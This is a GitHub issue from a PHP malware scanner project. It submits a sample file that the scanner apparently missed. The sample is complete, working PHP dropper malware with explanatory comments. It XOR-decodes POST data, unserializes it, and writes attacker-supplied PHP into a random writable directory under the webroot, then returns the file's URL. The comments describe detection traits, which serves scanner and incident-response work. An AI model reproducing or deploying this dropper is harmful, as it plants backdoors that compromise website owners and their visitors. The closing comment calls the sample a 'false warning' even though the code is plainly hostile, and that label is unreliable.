scr34m / php-malware-scanner

Scans PHP files for malwares and known threats
GNU General Public License v3.0

Missing malware file example #21

Closed rthrash closed 6 years ago

rthrash commented 6 years ago
<?php
// Obfuscated, POST-triggered file dropper. Input arrives as POST parameters; no payload
// or destination path is stored in the file itself.
// Traits a scanner rule can key on, all visible below: function declarations nested
// inside other function bodies, str_rot13() + rawurldecode() + per-byte XOR applied to
// request data, @unserialize() of the decoded result, a recursive glob()/is_writable()
// walk of DOCUMENT_ROOT, and file_put_contents() to a generated "*.php" name.

// Static part of the XOR key (16 bytes). The second part is the POST parameter name.
$mfcux = "ljnlfyxhkwljsapl";
// Receives the name of the POST parameter being processed; assigned in oiyvmhtsf().
$lalxpth = "";

// Gate: only parameters whose name has length 16 and whose value contains more than
// ten "%" characters are handed to the decoder. Everything else is ignored.
foreach ($_POST as $oohzmoss => $edoawzcjq){
    if (strlen($oohzmoss) == 16 and substr_count($edoawzcjq, "%") > 10){
        oiyvmhtsf($oohzmoss, $edoawzcjq);
    }
}

/**
 * Decodes one POST value and acts on the result.
 *
 * $oohzmoss is the POST parameter name (copied into the global $lalxpth and used as
 * key material); $cdafv is the raw POST value. Nothing is returned: both branches
 * taken for a successfully decoded array end in exit().
 */
function oiyvmhtsf($oohzmoss, $cdafv){
    global $lalxpth;
    $lalxpth = $oohzmoss;
    // Undo the transport encoding: ROT13, then percent-decoding, then split into bytes.
    $cdafv = str_split(rawurldecode(str_rot13($cdafv)));
    // Declared only when oiyvmhtsf() runs. XORs one byte ($krsugph) with the byte at the
    // same index (modulo length) of the static key and of the parameter name.
    function bapdyxs($krsugph, $oohzmoss){
        global $mfcux, $lalxpth;
        return $krsugph ^ $mfcux[$oohzmoss % strlen($mfcux)] ^ $lalxpth[$oohzmoss % strlen($lalxpth)];
    }
    // array_values()/array_keys() pass each byte together with its index to bapdyxs().
    $cdafv = implode("", array_map("bapdyxs", array_values($cdafv), array_keys($cdafv)));
    // unserialize() is applied to request-controlled bytes; "@" suppresses the notice
    // raised for malformed input, so failed attempts leave no PHP error output.
    $cdafv = @unserialize($cdafv);
    if (@is_array($cdafv)){
        $oohzmoss = array_keys($cdafv);
        $cdafv = $cdafv[$oohzmoss[0]];
        if ($cdafv === $oohzmoss[0]){
            // First value identical to its own key: answer with the serialized PHP
            // version and stop. Nothing is written in this branch.
            echo @serialize(Array('php' => @phpversion(), ));
            exit();
        }else{
            // Collects writable directories below $mpyckqybuir, recursing into every
            // subdirectory; the static $sadowmop accumulates across the recursive calls.
            function jmcnve($mpyckqybuir) {
                static $sadowmop = array();
                $lttbxub = glob($mpyckqybuir . '/*', GLOB_ONLYDIR);
                if (count($lttbxub) > 0) {
                    foreach ($lttbxub as $mpyckqybu){
                        if (@is_writable($mpyckqybu)){
                            $sadowmop[] = $mpyckqybu;
                        }
                    }
                }
                foreach ($lttbxub as $mpyckqybuir) jmcnve($mpyckqybuir);
                return $sadowmop;
            }
            $ugouxvfh = $_SERVER["DOCUMENT_ROOT"];
            $lttbxub = jmcnve($ugouxvfh);
            $oohzmoss = array_rand($lttbxub);
            // Target path: a randomly chosen writable directory plus the first 8 hex
            // characters of md5(time()) and ".php". For incident response this means
            // looking for 8-hex-character .php files in writable webroot subdirectories.
            $ktabzhde = $lttbxub[$oohzmoss] . "/" . substr(md5(time()), 0, 8) . ".php";
            // The first array value of the decoded input becomes the file content;
            // "@" hides a failed write.
            @file_put_contents($ktabzhde, $cdafv);
            // Replies with the URL of the written file: Host header plus the path
            // relative to the document root. This response body is a usable log/IDS marker.
            echo "http://" . $_SERVER["HTTP_HOST"] . substr($ktabzhde, strlen($ugouxvfh));
            exit();
        }
    }
}
rthrash commented 6 years ago

False warning. Ignore!